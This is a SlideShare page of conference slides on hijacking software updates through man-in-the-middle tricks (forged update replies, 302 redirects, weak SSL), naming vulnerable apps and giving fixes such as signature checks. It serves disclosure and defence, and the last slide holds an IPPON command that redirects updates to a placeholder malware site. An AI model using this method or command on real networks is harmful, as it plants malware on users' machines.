SlideShare una empresa de Scribd logo
1 de 29
Descargar para leer sin conexión
The Day Of The Update

   Once upon an Update …

         Itzik Kotler
        Tomer Bitton
Update? I already donated
• Ability to delivery bug fixes or new features
  to existing customers of applications

• Natural inhibitors:
  – Punch Cards
  – BBS/Modem
  – Floppies/CD’s
  – Internet
What’s The Big Update?
• Updates are usually a background tasks,
  thus draw little attention from the user
• Most updates are binaries that gets
  executed on the updater machine
• An update can be used to manipulate
  sensitive data such as anti-virus rules
• Update can be silently tampered with it,
  leaving almost no trace behind
Catching an Update
• Feasible over a variety of MITM Attacks:
  – Wi-Fi via Open/Weak Cryptography
  – LAN via ARP Poisoning
  – WAN via DNS Cache Attack (Thanks Dan!)


• Wi-Fi is our favorite choice, common in
  Airports/McDonalds/Café shops and etc.
Subverting The Update
            Procedure
• Client asks Server whether it’s up to date
  – Replied with Negative Answer
• Client asks Server for Download Sites
  – Replied with Malicious Sites
                    OR
• Client downloads from a Known Site
  – Redirected into a Malicious Site
Subverting The Update
               Connection
• Spoofing Server Reply:
  – IP:
     • Invert source and destination addresses
  – TCP:
     •   Invert source and destination ports
     •   SEQ is received ACK
     •   ACK SEQ is received DATA + SEQ
     •   One Shot, One Kill Flags: PUSH + ACK + FIN
• FIN flag is muting the Server, and possibly
  causing the Client to disconnect afterward
Subverting The Update Agent
• Client accesses a Document (XML/INI/...)
  – Reply w/ 200 OK (Cooked Data)
     • Document contains Malicious Binary Sites
• Client downloads a File
  – Reply w/ 302 (Redirection)
     • Redirection to Malicious Binary Site
• Server
  – Will be Ignored (muted at Connection Level)
Attack Walkthrough:

200 OK w/ Cooked Data
Target Application: Notepad++
Notepad++
Checks For a New Version
Replied w/ 200 OK (Cooked Data)
200 OK w/ Cooked Document
• Update expects:
  – List of Sites for Downloads
    • Upcoming downloads will go to our sites
  – Is There A Newer Version Available?
    • There’s always a “newer” version for you
• Summary:
  – Update will take place on our provided sites
  – One Shot, One Kill!
Attack Walkthrough:

302 Found w/ Malicious Site
   Target Application: Skype
Skype Downloads a Newer Version
Replied w/ 302 Found (M. URL)
302 Found w/ Malicious URL
• Update expects:
  – 200 OK on SkypeSetup.exe
• Update receives:
  – 302 Found w/ SkypeSetup.exe
    • This download will go to our site
• Summary:
  – Pre-programmed URLs bypassed
  – One Shot, One Kill!
Attack Walkthrough:

   200 OK + 302 Found
Target Application: MalwareBytes
MalwareBytes Update Flow
Replied w/ 200 and 302
Combo Attack (200 + 302)
• Update document don’t contains sites
  – 200 OK only contains a positive update
    answer, no sites or other parameters defined
• Update has a pre-defined URL
  – 302 Found redirects the upcoming download
    to our own site
Time for an Update Check!
• Who’s also Vulnerable?
  – Alcohol 120
  – GOM Player
  – iMesh
  – Skype
  – Hex Workshop
  – Adobe PDF Reader
  –…
• Let’s see IPPON taking them down!
IPPON Targets Maintenance
• IPPON takes it’s targets from an XML file
  that contains triggers and responses

• IPPON Target specifics:
  – Response which is either static, dynamic (on
    the fly) or a redirection attempt
  – Trigger which is made of a given HOST, URL
    and can be equal to ANY
SSL Can Update Me Better?
• Generally yes, but surprisingly common
  implementations of it in Updaters not.
• SSL is expensive resource-wise, thus it’s
  not fit for an entire download session
• Update takes place in the background,
  there’s no little golden lock so not
  everybody puts the efforts
Update w/ Self Signed Certificate
• For an effective SSL the Server must
  present a valid, verifiable Certificate that
  costs money.
• Cheap SSL Solutions:
  – Update w/ Self Signed Certificate
  – Update w/ Third-Party Certificate (certificate
    validity not verified)
• Result:
  – Vulnerable, only provides looks ‘n feel!
Update w/ NULL Cipher
• SSL Server gets to pick Cipher Suite
• It’s possible to race condition ServerHello
  or ClientHello messages to gain visibility
• If Cipher is set to NULL, there’s little
  benefit for SSL
• Minimum Cipher Suite Strength should be
  set in advance to avoid such tampering
Update, for a better future
• Digital Signature
  – Update agent holds a public key, and can
    verify the download directly, or indirectly
    throughout a file that contains an md5/sha1
• SSL (The Right Way):
  – Must be Valid/Verifiable Certificate
  – Only needs to exchange an MD5/SHA1 of the
    upcoming download
Nothing but an Update Party!
• Proprietary Update Attack:
  – Playing w/ Anti Virus Rules
     • Anti Virus Attacks Legitimate Applications
     • Anti Virus Attacks Itself
     • Anti Virus Protects Virus
• Hit ‘n Run Mode:
  – If application saves, or maintains a list of latest
    download sites and you’ve managed to slip one –
    you’ve got an returning customer ☺
• Contagious Mode:
  – Embedding IPPON and run it on updater, so they
    could in turn infect their insecure environment
    wherever they go
Questions?
IPPON Project:

http://code.google.com/p/ippon-mitm/

 Get your latest version and targets!
Happy Updating! ☺

 ./ippon.py –w –i <INTERFACE>
targets.xml -u <MALWARE SITE>

Más contenido relacionado

La actualidad más candente

Free OpManager training Part1- Discovery and classification season#3
Free OpManager training Part1- Discovery and classification season#3Free OpManager training Part1- Discovery and classification season#3
Free OpManager training Part1- Discovery and classification season#3ManageEngine, Zoho Corporation
 
Practical solutions for connections administrators
Practical solutions for connections administratorsPractical solutions for connections administrators
Practical solutions for connections administratorsSharon James
 
2015 02 24 lmtv baselining
2015 02 24 lmtv baselining2015 02 24 lmtv baselining
2015 02 24 lmtv baseliningTony Fortunato
 
be the captain of your connections deployment
be the captain of your connections deploymentbe the captain of your connections deployment
be the captain of your connections deploymentSharon James
 
Fiddler web testing tool
Fiddler web testing toolFiddler web testing tool
Fiddler web testing toolHimaniChauhan
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconKarl Fosaaen
 
HCL Sametime V11 installation - tips
HCL Sametime V11 installation - tipsHCL Sametime V11 installation - tips
HCL Sametime V11 installation - tipsAles Lichtenberg
 
Security workflow with ansible
Security  workflow with ansibleSecurity  workflow with ansible
Security workflow with ansibledevanshdubey7
 

La actualidad más candente (10)

Free OpManager training Part1- Discovery and classification season#3
Free OpManager training Part1- Discovery and classification season#3Free OpManager training Part1- Discovery and classification season#3
Free OpManager training Part1- Discovery and classification season#3
 
Computer Network Part 1
Computer Network Part 1Computer Network Part 1
Computer Network Part 1
 
Practical solutions for connections administrators
Practical solutions for connections administratorsPractical solutions for connections administrators
Practical solutions for connections administrators
 
2015 02 24 lmtv baselining
2015 02 24 lmtv baselining2015 02 24 lmtv baselining
2015 02 24 lmtv baselining
 
be the captain of your connections deployment
be the captain of your connections deploymentbe the captain of your connections deployment
be the captain of your connections deployment
 
WebRTC Demystified
WebRTC DemystifiedWebRTC Demystified
WebRTC Demystified
 
Fiddler web testing tool
Fiddler web testing toolFiddler web testing tool
Fiddler web testing tool
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
 
HCL Sametime V11 installation - tips
HCL Sametime V11 installation - tipsHCL Sametime V11 installation - tips
HCL Sametime V11 installation - tips
 
Security workflow with ansible
Security  workflow with ansibleSecurity  workflow with ansible
Security workflow with ansible
 

Similar a How Attackers Can Subvert Software Updates to Spread Malware

44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON
 
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oracle
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, OracleIssues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oracle
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oraclemfrancis
 
Green Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsGreen Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsOlivier Philippot
 
hardware and software upgrade
hardware and software upgradehardware and software upgrade
hardware and software upgradeDana Popescu
 
StHack 2014 - Jerome "@funoverip" Nokin Turning your managed av into my botnet
StHack 2014 - Jerome "@funoverip" Nokin  Turning your managed av into my botnetStHack 2014 - Jerome "@funoverip" Nokin  Turning your managed av into my botnet
StHack 2014 - Jerome "@funoverip" Nokin Turning your managed av into my botnetStHack
 
CIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMCIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMICF CIRCUIT
 
Migrating IBM i Systems to the Cloud: Exploring the Pros and Cons
Migrating IBM i Systems to the Cloud: Exploring the Pros and ConsMigrating IBM i Systems to the Cloud: Exploring the Pros and Cons
Migrating IBM i Systems to the Cloud: Exploring the Pros and ConsPrecisely
 
Software update for IoT: the current state of play
Software update for IoT: the current state of playSoftware update for IoT: the current state of play
Software update for IoT: the current state of playChris Simmonds
 
Road to Continuous Delivery - Wix.com
Road to Continuous Delivery - Wix.comRoad to Continuous Delivery - Wix.com
Road to Continuous Delivery - Wix.comAviran Mordo
 
One Way Hackers Steal Data From Your Systems
One Way Hackers Steal Data From Your SystemsOne Way Hackers Steal Data From Your Systems
One Way Hackers Steal Data From Your SystemsWilliam Kiss
 
DevSecOps: Putting the Sec into the DevOps
DevSecOps: Putting the Sec into the DevOpsDevSecOps: Putting the Sec into the DevOps
DevSecOps: Putting the Sec into the DevOpsshira koper
 
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...Amazon Web Services
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
Eliminate the Impact of Planned Downtime on your IBM i
Eliminate the Impact of Planned Downtime on your IBM iEliminate the Impact of Planned Downtime on your IBM i
Eliminate the Impact of Planned Downtime on your IBM iPrecisely
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingNetSPI
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Spot Trading - A case study in continuous delivery for mission critical finan...
Spot Trading - A case study in continuous delivery for mission critical finan...Spot Trading - A case study in continuous delivery for mission critical finan...
Spot Trading - A case study in continuous delivery for mission critical finan...SaltStack
 

Similar a How Attackers Can Subvert Software Updates to Spread Malware (20)

44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
 
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oracle
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, OracleIssues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oracle
Issues in Designing Push Based Mobile Application Platform - Rafiul Ahad, Oracle
 
Software Security and IDS.pptx
Software Security and IDS.pptxSoftware Security and IDS.pptx
Software Security and IDS.pptx
 
Green Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsGreen Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject Details
 
hardware and software upgrade
hardware and software upgradehardware and software upgrade
hardware and software upgrade
 
StHack 2014 - Jerome "@funoverip" Nokin Turning your managed av into my botnet
StHack 2014 - Jerome "@funoverip" Nokin  Turning your managed av into my botnetStHack 2014 - Jerome "@funoverip" Nokin  Turning your managed av into my botnet
StHack 2014 - Jerome "@funoverip" Nokin Turning your managed av into my botnet
 
CIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMCIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEM
 
Migrating IBM i Systems to the Cloud: Exploring the Pros and Cons
Migrating IBM i Systems to the Cloud: Exploring the Pros and ConsMigrating IBM i Systems to the Cloud: Exploring the Pros and Cons
Migrating IBM i Systems to the Cloud: Exploring the Pros and Cons
 
Software update for IoT: the current state of play
Software update for IoT: the current state of playSoftware update for IoT: the current state of play
Software update for IoT: the current state of play
 
Road to Continuous Delivery - Wix.com
Road to Continuous Delivery - Wix.comRoad to Continuous Delivery - Wix.com
Road to Continuous Delivery - Wix.com
 
One Way Hackers Steal Data From Your Systems
One Way Hackers Steal Data From Your SystemsOne Way Hackers Steal Data From Your Systems
One Way Hackers Steal Data From Your Systems
 
DevSecOps: Putting the Sec into the DevOps
DevSecOps: Putting the Sec into the DevOpsDevSecOps: Putting the Sec into the DevOps
DevSecOps: Putting the Sec into the DevOps
 
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...
(APP307) Leverage the Cloud with a Blue/Green Deployment Architecture | AWS r...
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2   basic hacking tools ncc groupNtxissacsc5 red 1 &amp; 2   basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
 
Eliminate the Impact of Planned Downtime on your IBM i
Eliminate the Impact of Planned Downtime on your IBM iEliminate the Impact of Planned Downtime on your IBM i
Eliminate the Impact of Planned Downtime on your IBM i
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration Testing
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Spot Trading - A case study in continuous delivery for mission critical finan...
Spot Trading - A case study in continuous delivery for mission critical finan...Spot Trading - A case study in continuous delivery for mission critical finan...
Spot Trading - A case study in continuous delivery for mission critical finan...
 

Más de Itzik Kotler

In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect ExfiltrationIn Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect ExfiltrationItzik Kotler
 
Goodbye Data, Hello Exfiltration
Goodbye Data, Hello ExfiltrationGoodbye Data, Hello Exfiltration
Goodbye Data, Hello ExfiltrationItzik Kotler
 
Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)Itzik Kotler
 
Sounds Like Botnet
Sounds Like BotnetSounds Like Botnet
Sounds Like BotnetItzik Kotler
 
Turbot - A Next Generation Botnet
Turbot - A Next Generation BotnetTurbot - A Next Generation Botnet
Turbot - A Next Generation BotnetItzik Kotler
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0Itzik Kotler
 

Más de Itzik Kotler (6)

In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect ExfiltrationIn Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
 
Goodbye Data, Hello Exfiltration
Goodbye Data, Hello ExfiltrationGoodbye Data, Hello Exfiltration
Goodbye Data, Hello Exfiltration
 
Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)
 
Sounds Like Botnet
Sounds Like BotnetSounds Like Botnet
Sounds Like Botnet
 
Turbot - A Next Generation Botnet
Turbot - A Next Generation BotnetTurbot - A Next Generation Botnet
Turbot - A Next Generation Botnet
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
 

How Attackers Can Subvert Software Updates to Spread Malware

  • 1. The Day Of The Update Once upon an Update … Itzik Kotler Tomer Bitton
  • 2. Update? I already donated • Ability to delivery bug fixes or new features to existing customers of applications • Natural inhibitors: – Punch Cards – BBS/Modem – Floppies/CD’s – Internet
  • 3. What’s The Big Update? • Updates are usually a background tasks, thus draw little attention from the user • Most updates are binaries that gets executed on the updater machine • An update can be used to manipulate sensitive data such as anti-virus rules • Update can be silently tampered with it, leaving almost no trace behind
  • 4. Catching an Update • Feasible over a variety of MITM Attacks: – Wi-Fi via Open/Weak Cryptography – LAN via ARP Poisoning – WAN via DNS Cache Attack (Thanks Dan!) • Wi-Fi is our favorite choice, common in Airports/McDonalds/Café shops and etc.
  • 5. Subverting The Update Procedure • Client asks Server whether it’s up to date – Replied with Negative Answer • Client asks Server for Download Sites – Replied with Malicious Sites OR • Client downloads from a Known Site – Redirected into a Malicious Site
  • 6. Subverting The Update Connection • Spoofing Server Reply: – IP: • Invert source and destination addresses – TCP: • Invert source and destination ports • SEQ is received ACK • ACK SEQ is received DATA + SEQ • One Shot, One Kill Flags: PUSH + ACK + FIN • FIN flag is muting the Server, and possibly causing the Client to disconnect afterward
  • 7. Subverting The Update Agent • Client accesses a Document (XML/INI/...) – Reply w/ 200 OK (Cooked Data) • Document contains Malicious Binary Sites • Client downloads a File – Reply w/ 302 (Redirection) • Redirection to Malicious Binary Site • Server – Will be Ignored (muted at Connection Level)
  • 8. Attack Walkthrough: 200 OK w/ Cooked Data Target Application: Notepad++
  • 10. Replied w/ 200 OK (Cooked Data)
  • 11. 200 OK w/ Cooked Document • Update expects: – List of Sites for Downloads • Upcoming downloads will go to our sites – Is There A Newer Version Available? • There’s always a “newer” version for you • Summary: – Update will take place on our provided sites – One Shot, One Kill!
  • 12. Attack Walkthrough: 302 Found w/ Malicious Site Target Application: Skype
  • 13. Skype Downloads a Newer Version
  • 14. Replied w/ 302 Found (M. URL)
  • 15. 302 Found w/ Malicious URL • Update expects: – 200 OK on SkypeSetup.exe • Update receives: – 302 Found w/ SkypeSetup.exe • This download will go to our site • Summary: – Pre-programmed URLs bypassed – One Shot, One Kill!
  • 16. Attack Walkthrough: 200 OK + 302 Found Target Application: MalwareBytes
  • 18. Replied w/ 200 and 302
  • 19. Combo Attack (200 + 302) • Update document don’t contains sites – 200 OK only contains a positive update answer, no sites or other parameters defined • Update has a pre-defined URL – 302 Found redirects the upcoming download to our own site
  • 20. Time for an Update Check! • Who’s also Vulnerable? – Alcohol 120 – GOM Player – iMesh – Skype – Hex Workshop – Adobe PDF Reader –… • Let’s see IPPON taking them down!
  • 21. IPPON Targets Maintenance • IPPON takes it’s targets from an XML file that contains triggers and responses • IPPON Target specifics: – Response which is either static, dynamic (on the fly) or a redirection attempt – Trigger which is made of a given HOST, URL and can be equal to ANY
  • 22. SSL Can Update Me Better? • Generally yes, but surprisingly common implementations of it in Updaters not. • SSL is expensive resource-wise, thus it’s not fit for an entire download session • Update takes place in the background, there’s no little golden lock so not everybody puts the efforts
  • 23. Update w/ Self Signed Certificate • For an effective SSL the Server must present a valid, verifiable Certificate that costs money. • Cheap SSL Solutions: – Update w/ Self Signed Certificate – Update w/ Third-Party Certificate (certificate validity not verified) • Result: – Vulnerable, only provides looks ‘n feel!
  • 24. Update w/ NULL Cipher • SSL Server gets to pick Cipher Suite • It’s possible to race condition ServerHello or ClientHello messages to gain visibility • If Cipher is set to NULL, there’s little benefit for SSL • Minimum Cipher Suite Strength should be set in advance to avoid such tampering
  • 25. Update, for a better future • Digital Signature – Update agent holds a public key, and can verify the download directly, or indirectly throughout a file that contains an md5/sha1 • SSL (The Right Way): – Must be Valid/Verifiable Certificate – Only needs to exchange an MD5/SHA1 of the upcoming download
  • 26. Nothing but an Update Party! • Proprietary Update Attack: – Playing w/ Anti Virus Rules • Anti Virus Attacks Legitimate Applications • Anti Virus Attacks Itself • Anti Virus Protects Virus • Hit ‘n Run Mode: – If application saves, or maintains a list of latest download sites and you’ve managed to slip one – you’ve got an returning customer ☺ • Contagious Mode: – Embedding IPPON and run it on updater, so they could in turn infect their insecure environment wherever they go
  • 29. Happy Updating! ☺ ./ippon.py –w –i <INTERFACE> targets.xml -u <MALWARE SITE>